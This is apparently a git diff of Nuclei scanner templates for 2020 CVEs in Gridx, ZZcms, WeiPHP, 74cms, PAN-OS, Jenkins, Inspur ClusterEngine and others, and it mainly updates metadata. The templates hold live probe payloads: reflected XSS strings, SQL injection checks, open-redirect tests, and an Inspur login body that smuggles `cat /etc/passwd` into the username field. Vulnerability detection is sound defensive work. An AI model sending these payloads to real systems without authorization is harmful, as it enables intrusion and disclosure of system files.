matchers-condition: and matchers: - type: word @@ -52,3 +57,5 @@ http: part: interactsh_request words: - "User-Agent: curl" + +# digest: 4b0a00483046022100ac3514f8dbba979394fb8d2c6c067f6cbad683cdb037ac155b3562ec1cb965bb022100f1b2542bb598710ff44cb728aaea06f7dcdc5f8880811bb7b0bd1565365c7335:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index 65d3f51c2d..26dfed7146 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Gridx. reference: - http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf - https://github.com/oria/gridx/issues/433 @@ -14,11 +16,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-19625 - cpe: cpe:2.3:a:gridx_project:gridx:*:*:*:*:*:*:*:* - epss-score: 0.87952 - tags: cve,cve2020,gridx,rce + epss-score: 0.8354 + epss-percentile: 0.98091 + cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gridx_project + product: gridx + tags: cve,cve2020,gridx,rce http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: @@ -37,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/27 +# digest: 4a0a0047304502202eb25680f39acc6d2a0161da3b481f3d5dd4aeb3cea917d40f2edcdf56a9830b022100fd98580b9031f80341d0d0e1984cb3ce7250871b565d25d9e58ed8d2023666b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index f7afedecc1..cf2dbfc726 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20285 @@ -14,12 +16,15 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20285 cwe-id: CWE-79 - cpe: cpe:2.3:a:zzcms:zzcms:*:*:*:*:*:*:*:* epss-score: 0.0009 + epss-percentile: 0.37861 + cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: zzcms verified: true + max-request: 1 + vendor: zzcms + product: zzcms + fofa-query: zzcms tags: cve,cve2020,zzcms,xss http: @@ -45,4 +50,4 @@ http: status: - 200 -# Enhanced by md on 2022/10/17 +# digest: 490a0046304402203167173534a5b17ac1e67f74b65cab4b9277b0af630c52ad48f7fbe8c484d14d02204701fcd7e171d0107c11ca38dd99415dc0f3dfcc0d5f4610c2c9463894bafda7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 9751e6da45..21bbc66741 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to a patched version of WeiPHP or apply the vendor-supplied patch to fix the SQL Injection vulnerability. reference: - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20300 @@ -14,12 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-20300 cwe-id: CWE-89 - cpe: cpe:2.3:a:weiphp:weiphp:*:*:*:*:*:*:*:* - epss-score: 0.14786 + epss-score: 0.16832 + epss-percentile: 0.95459 + cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"WeiPHP5.0" verified: true + max-request: 1 + vendor: weiphp + product: weiphp + shodan-query: http.html:"WeiPHP5.0" tags: weiphp,sql http: @@ -38,4 +43,4 @@ http: status: - 500 -# Enhanced by mp on 2022/09/28 +# digest: 4b0a00483046022100a9583fa1a4d9429cd75e930eb108006dffd4e7488f27ce2f197fb6b1cc272e59022100cc8ed72e275512638386fca09f1b58a8d8b5a10c23a9d9d2d853e3b972aaf8d5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 8436e68efd..87f2268f75 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -2,10 +2,12 @@ id: CVE-2020-2036 info: name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting - author: madrobot + author: madrobot,j4vaovo severity: high description: | PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. + remediation: | + Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ - https://security.paloaltonetworks.com/CVE-2020-2036 @@ -15,33 +17,38 @@ info: cvss-score: 8.8 cve-id: CVE-2020-2036 cwe-id: CWE-79 + epss-score: 0.01161 + epss-percentile: 0.83329 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* - epss-score: 0.01561 - tags: cve,cve2020,vpn,xss metadata: - max-request: 2 + max-request: 3 + vendor: paloaltonetworks + product: pan-os + tags: cve,cve2020,vpn,xss http: - - method: GET - path: - - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" + - raw: + - | + GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} - stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - "!contains(tolower(body_1), '')" + condition: and - - type: word - words: - - "" - part: body + - type: dsl + dsl: + - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" + - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" + condition: or - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/07/13 +# digest: 4a0a00473045022100d123618501cd17533696c89638e9b16ddd71fb5fac13ca7b3278d83beb4795d7022035bd91a2fd4c43671152445005f379d3799a451dbc94a6d38c297ddcdf427c74:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 9db83ecdaa..df11a7840e 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability. + remediation: | + Upgrade to the latest version of Jenkins Gitlab Hook plugin (>=1.4.3) to mitigate this vulnerability. reference: - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683 - http://www.openwall.com/lists/oss-security/2020/01/15/1 @@ -15,10 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-2096 cwe-id: CWE-79 - cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:*:*:* - epss-score: 0.97056 + epss-score: 0.96822 + epss-percentile: 0.9957 + cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 + vendor: jenkins + product: gitlab_hook + framework: jenkins shodan-query: http.title:"GitLab" tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020 @@ -29,10 +35,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -43,4 +45,8 @@ http: words: - text/html -# Enhanced by mp on 2022/08/14 + - type: status + status: + - 200 + +# digest: 4b0a004830460221009fa56b19165d6bb8a8ead80708072972eb397e2c1b94f2b01c51c045b4d43c37022100e1b1bfe4e989abcd44518b7fdcfe1146461a05abcddec4f692cfa5cfaaf6db4f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 7389d363fd..95f621b4e5 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,ritikchaddha severity: critical description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/shadoweb/wdja/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 @@ -13,11 +15,14 @@ info: cvss-score: 9.6 cve-id: CVE-2020-20982 cwe-id: CWE-79 - cpe: cpe:2.3:a:wdja:wdja_cms:*:*:*:*:*:*:*:* - epss-score: 0.01606 + epss-score: 0.01894 + epss-percentile: 0.87185 + cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: wdja + product: wdja_cms tags: cve,cve2020,xss,wdja,shadoweb http: @@ -26,12 +31,13 @@ http: - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true + matchers-condition: and matchers: - type: word - condition: and words: - "location.href='" + condition: and - type: word part: header @@ -42,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/27 +# digest: 4b0a00483046022100999addb50d66e524dd16247edd81fce2afdc409b569f5a8eb2721122129c930a022100b841a09dc44c5ce5946c116f183f6ae10e1bcde79ce46a11aeb6967b4e9bbd9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index 0c73c5fccd..2fb6cfd091 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://mycvee.blogspot.com/p/xss2.html - https://nvd.nist.gov/vuln/detail/CVE-2020-20988 @@ -14,11 +16,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20988 cwe-id: CWE-79 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-score: 0.0009 + epss-percentile: 0.37861 + cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: domainmod + product: domainmod tags: cve,cve2020,domainmod,xss,authenticated http: @@ -49,4 +54,4 @@ http: - 'contains(body_2, "DomainMOD")' condition: and -# Enhanced by mp on 2022/08/14 +# digest: 4b0a00483046022100fda3d18a81a203389ff8606d8d95c9d4a602ecc13d02be94dc4336c17e23cf95022100f6728bd15dafb42ce4702b2458dc156930d7d32b845ac41b0238c34c1bbfe690:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index cedf94aba6..de59b7426f 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0. reference: - https://github.com/hitIer/web_test/tree/master/hotel - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html @@ -15,11 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 - cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:*:*:*:*:*:*:*:* - epss-score: 0.02586 + epss-score: 0.0341 + epss-percentile: 0.90375 + cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: hotel_and_lodge_booking_management_system_project + product: hotel_and_lodge_booking_management_system tags: cve,cve2020,hotel,sqli,unauth http: @@ -39,4 +44,4 @@ http: - 'contains(body, "Hotel Booking System")' condition: and -# Enhanced by md on 2022/12/08 +# digest: 4a0a00473045022100b05dd3663ef4c421205f97a2fdf67506802e326eb37cee7ed63c59c626d8a0bd02204e3de64905e54c4b17b65e0babdb15cbbe20999fc1113307d72c9b72a107967c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 84373917d5..1b7fcd9d1c 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -5,20 +5,26 @@ info: author: c-sh0 severity: medium description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability. reference: - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - http://www.openwall.com/lists/oss-security/2020/01/29/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 + - https://access.redhat.com/errata/RHBA-2020:0402 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-2103 cwe-id: CWE-200 - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* - epss-score: 0.00535 + epss-score: 0.01531 + epss-percentile: 0.8564 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 + vendor: jenkins + product: jenkins shodan-query: http.favicon.hash:81586312 tags: cve,cve2020,jenkins @@ -27,26 +33,22 @@ http: - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 Host: {{Hostname}} - - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 Host: {{Hostname}} cookie-reuse: true req-condition: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - 'text/html' - 'x-jenkins' - condition: and case-insensitive: true + condition: and - type: word part: body_2 @@ -55,9 +57,13 @@ http: - 'SessionId: null' condition: and + - type: status + status: + - 200 + extractors: - type: kval kval: - x_jenkins -# Enhanced by md on 2023/04/04 +# digest: 490a00463044022078c090a20ecdc13fa15a0d4b155200054ff8038eafbc6cf1930fb73499b5814e022005e3f040a70702d899996064dc1e27d8a9f5721a050d5038ebc70239efbe7949:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index 682227bac3..a15e9c45f0 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server. + remediation: | + Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability. reference: - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul - https://nvd.nist.gov/vuln/detail/CVE-2020-21224 @@ -14,33 +16,36 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 - cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:* - epss-score: 0.02686 - tags: cve,cve2020,clusterengine,rce + epss-score: 0.03633 + epss-percentile: 0.90633 + cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: inspur + product: clusterengine + tags: cve,cve2020,clusterengine,rce http: - method: POST path: - "{{BaseURL}}/login" - headers: - Content-Type: application/x-www-form-urlencoded - Referer: "{{Hostname}}/module/login/login.html" body: | op=login&username=;`cat /etc/passwd`&password= + headers: + Content-Type: application/x-www-form-urlencoded + Referer: "{{Hostname}}/module/login/login.html" + matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/04/28 +# digest: 4a0a00473045022100a526a58f93223aaa31bc08d2c5d76ba211d8d6284dbc2e7141ea9dc3dc81720a02201e0b5b0b72320a50c6183bc9954f05bbc7797164c8526ddedffc5be78b01b92b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 26193a3efa..145d6e3954 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -5,6 +5,8 @@ info: author: j3ssie/geraldino2 severity: medium description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. + remediation: | + Upgrade to the latest version of Jenkin Audit Trail (>=3.3) which includes a fix for this vulnerability. reference: - https://www.jenkins.io/security/advisory/2020-03-09/ - https://nvd.nist.gov/vuln/detail/CVE-2020-2140 @@ -15,11 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-2140 cwe-id: CWE-79 - cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:*:*:* - epss-score: 0.00155 - tags: cve,cve2020,jenkins,xss,plugin + epss-score: 0.00181 + epss-percentile: 0.55186 + cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 + vendor: jenkins + product: audit_trail + framework: jenkins + tags: cve,cve2020,jenkins,xss,plugin http: - method: GET @@ -30,17 +36,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: -

    sample - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: - 200 -# Enhanced by mp on 2022/05/04 +# digest: 4b0a004830460221009c69691c4c3b77fc8e662d4f392d3116f2a080675db1f8ea991f63301472ac8b022100839541c9d076c698369e30ba505c38591e79c68987323d071af3314cb972eba6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 3c68c66f45..90745db798 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -6,22 +6,26 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. + remediation: | + Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability. reference: - https://github.com/blindkey/cve_like/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22208 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + epss-percentile: 0.94387 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="74cms" + vendor: 74cms + product: 74cms shodan-query: http.html:"74cms" + fofa-query: app="74cms" tags: cve,cve2020,74cms,sqli - variables: num: "999999999" @@ -36,4 +40,4 @@ http: words: - '{{md5({{num}})}}' -# Enhanced by cs on 2022/06/21 +# digest: 4a0a0047304502207f099ee50fca60e4ad47c00d7abf247c91e39e23d7df380fa295dfa1f60b00d4022100eb0672ca27d65f7523a3ce1588ebc49c7937474e32f3b67b39d527f1e6a3a45a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index c4481d6e4e..15ff368c74 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -6,22 +6,26 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file. reference: - https://github.com/blindkey/cve_like/issues/12 - https://nvd.nist.gov/vuln/detail/CVE-2020-22209 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22209 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + epss-percentile: 0.94387 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="74cms" + vendor: 74cms + product: 74cms shodan-query: http.html:"74cms" + fofa-query: app="74cms" tags: cve,cve2020,74cms,sqli - variables: num: "999999999" @@ -36,4 +40,4 @@ http: words: - '{{md5({{num}})}}' -# Enhanced by cs on 2022/06/21 +# digest: 490a0046304402201369e083cb7a4e6f5aebd06fd5549d45084b66e386db89238f76b22e9cade862022019982c02ad0bf86ba63096f3341ff02e83fd7f213500ce1a4ee09bca7abcfa0a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index afd5c1aac4..5f8f816377 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file. reference: - https://github.com/blindkey/cve_like/issues/11 - https://nvd.nist.gov/vuln/detail/CVE-2020-22210 @@ -14,14 +16,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + epss-percentile: 0.94387 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="74cms" + vendor: 74cms + product: 74cms shodan-query: http.html:"74cms" + fofa-query: app="74cms" tags: cve,cve2020,74cms,sqli - variables: num: "999999999" @@ -36,4 +40,4 @@ http: words: - '{{md5({{num}})}}' -# Enhanced by cs on 2022/06/21 +# digest: 4a0a00473045022068e855a38e6ffae7c63b90303b79781f28587629390147cf416951185b7fb83a0221008ffbac016e271b0e6fd3ecf83d19590afea73b611e3abc638200df2e42d80c52:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index b6983ca420..5599e1a640 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -6,22 +6,26 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms. reference: - https://github.com/blindkey/cve_like/issues/13 - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22210 + cve-id: CVE-2020-22211 cwe-id: CWE-89 - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* - epss-score: 0.12933 + epss-score: 0.10555 + epss-percentile: 0.94387 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="74cms" + vendor: 74cms + product: 74cms shodan-query: http.html:"74cms" + fofa-query: app="74cms" tags: cve,cve2020,74cms,sqli - variables: num: "999999999" @@ -36,4 +40,4 @@ http: words: - '{{md5({{num}})}}' -# Enhanced by cs on 2022/06/21 +# digest: 4a0a004730450220507013cc15efb8df6f8c752d1bae44ea77cc6ae42af3c7496e89042fca422298022100cc452e13aad10de23fdb83bb52bf0792e2edcd28c9b6d4d903aaaaacb833f547:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index 97dfd97f1a..5a35a1b387 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840). reference: - https://github.com/b2evolution/b2evolution/issues/102 - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html @@ -15,11 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-22840 cwe-id: CWE-601 + epss-score: 0.01161 + epss-percentile: 0.83328 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* - epss-score: 0.00649 - tags: packetstorm,edb,cve,cve2020,redirect,b2evolution metadata: max-request: 1 + vendor: b2evolution + product: b2evolution + tags: packetstorm,edb,cve,cve2020,redirect,b2evolution http: - method: GET @@ -28,8 +33,8 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - part: header -# Enhanced by md on 2022/10/13 +# digest: 4a0a004730450220058f8299d17220f8d1701fae3f47ebc595e428e2bc7eeedb6c3c69b491b548c6022100d644b4a78b1a64be4c4dfa963e8c682d1c0d54f877081f94238efcad38e32cbf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index df0bad5c55..123a8f35ae 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade OPNsense to a version higher than 20.1.5 to mitigate the vulnerability. reference: - https://github.com/opnsense/core/issues/4061 - https://nvd.nist.gov/vuln/detail/CVE-2020-23015 @@ -13,15 +15,17 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23015 cwe-id: CWE-601 - cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* epss-score: 0.00228 - tags: cve,cve2020,redirect,opnsense + epss-percentile: 0.60864 + cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opnsense + product: opnsense + tags: cve,cve2020,redirect,opnsense http: - method: GET - path: - '{{BaseURL}}/?url=http://interact.sh' @@ -31,4 +35,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# Enhanced by md on 2022/10/13 +# digest: 4a0a004730450221009d3b3e03f812d4c4c1998ba9a412553da86724c19b5ca51e3050e2a20b2be979022020be98a2868c035b60b4546a62a3a02e27c0d547cfb586a1b7e7a62378216b8e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 075b82623f..e7cd3b111c 100644 --- 